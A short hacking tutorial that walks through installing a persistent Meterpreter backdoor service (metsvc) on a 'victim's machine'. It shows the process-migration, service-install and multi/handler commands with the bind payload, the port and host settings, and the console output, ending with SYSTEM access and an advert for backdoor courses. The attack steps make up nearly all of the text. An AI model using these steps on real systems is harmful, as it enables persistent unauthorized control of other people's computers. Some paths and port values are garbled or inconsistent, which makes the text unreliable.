Meterpreter Backdoor requires a script named
It's a list of useful commands use to interact with a victim's machine from a backdoor.To get that script, go to: http://www.phreedom.org/software/metsvc/
Ok, now I assume you downloaded the script and have configured the
for it.Let's start...After our session has been started in
, we need to list the processes by typing ps:
meterpreter > ps
It will give a list of all running taskse.g.
001 explorer.exe002 notepad.exe
etc.For selecting, type migrate and then the task number 001 for explorer or other:
meterpreter > migrate 001[*] Migrating to 001...[*] Migration completed successfully.
We need to start metsvc:
meterpreter > run metsvc[*] Creating a meterpreter service on port 1337[*] Creating a temporary installation directory C:DOCUME~1ThinkerLOCALS~1TempClTpasVnksh...[*] >> Uploading metsrv.dll...[*] >> Uploading metsvc-server.exe...[*] >> Uploading metsvc.exe...[*] Starting the service...[*] * Installing service metsvc* Starting serviceService metsvc successfully installed.
For help, you can see additional options by typing:
meterpreter > run metsvc -h[*]OPTIONS:-A Automatically start a matching multi/handler to connect to the service-h This help menu-r Uninstall an existing Meterpreter service (files must be deleted manually)
We need to handle metsvc for interaction with the system. Here, we'll use tcp_bind payload from metsvc:
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcpPAYLOAD => windows/metsvc_bind_tcp
Setting a port listener on specific local port for the local host:
msf exploit(handler) > set LPORT 31337LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.0RHOST => 192.168.1.0
Help and options about target:
msf exploit(handler) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------Payload options (windows/metsvc_bind_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique: seh, thread, processLPORT 1337 yes The local portRHOST 192.168.1.0 no The target addressExploit target:Id Name-- ----0 Wildcard Target
msf exploit(handler) > exploit
We've owned it. We can see any task and can interact with system.
meterpreter > pwdC:WINDOWSsystem32meterpreter > getuidServer username: ThinkerSYSTEM
Thanks and stay tuned for more.-- Multi Thinker
Want to learn more about backdoors? Start learning now by enrolling in our FREE courses: